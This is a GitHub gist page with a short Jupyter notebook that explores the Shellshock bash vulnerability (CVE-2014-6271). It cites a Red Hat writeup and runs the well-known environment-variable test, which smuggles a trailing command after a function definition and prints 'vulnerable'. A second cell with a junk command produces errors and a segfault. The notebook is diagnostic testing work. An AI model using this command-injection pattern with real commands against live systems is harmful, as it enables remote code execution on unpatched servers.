Skip to content

Instantly share code, notes, and snippets.

@rgbkrk

rgbkrk/Exploring bash vulnerability CVE-2014-6271.ipynb

Last active August 29, 2015 14:06
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save rgbkrk/b55597a4d98c69b56692 to your computer and use it in GitHub Desktop.
Save rgbkrk/b55597a4d98c69b56692 to your computer and use it in GitHub Desktop.
Download ZIP
Exploring bash vulnerability CVE-2014-6271
Display the source blob
Display the rendered blob
Raw
Exploring bash vulnerability CVE-2014-6271.ipynb
{
"metadata": {
"kernelspec": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"display_name": "IPython (Python 3)",
"language": "python",
"name": "python3"
},
"name": "",
"signature": "sha256:140963b434a9051615052730bb865273c65f0932c8175bfd22fb8bb77277f668"
},
"nbformat": 3,
"nbformat_minor": 0,
"worksheets": [
{
"cells": [
{
"cell_type": "markdown",
"metadata": {},
"source": [
"# Scoping out the Bash vulnerability\n",
"\n",
"Great [writeup from RedHat](https://access.redhat.com/articles/1200223), as always"
]
},
{
"cell_type": "code",
"collapsed": false,
"input": [
"%%bash\n",
"X='() { :;}; echo vulnerable' bash -c \"\""
],
"language": "python",
"metadata": {},
"outputs": [
{
"output_type": "stream",
"stream": "stdout",
"text": [
"vulnerable\n"
]
}
],
"prompt_number": 1
},
{
"cell_type": "code",
"collapsed": false,
"input": [
"%%bash\n",
"X='() { :;}; junktxt' bash -c \"\""
],
"language": "python",
"metadata": {},
"outputs": [
{
"output_type": "stream",
"stream": "stderr",
"text": [
"bash: junktxt: No such file or directory\n",
"bash: line 1: 54 Segmentation fault X='() { :;}; junktxt' bash -c \"\"\n"
]
}
],
"prompt_number": 2
},
{
"cell_type": "code",
"collapsed": false,
"input": [],
"language": "python",
"metadata": {},
"outputs": []
}
],
"metadata": {}
}
]
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment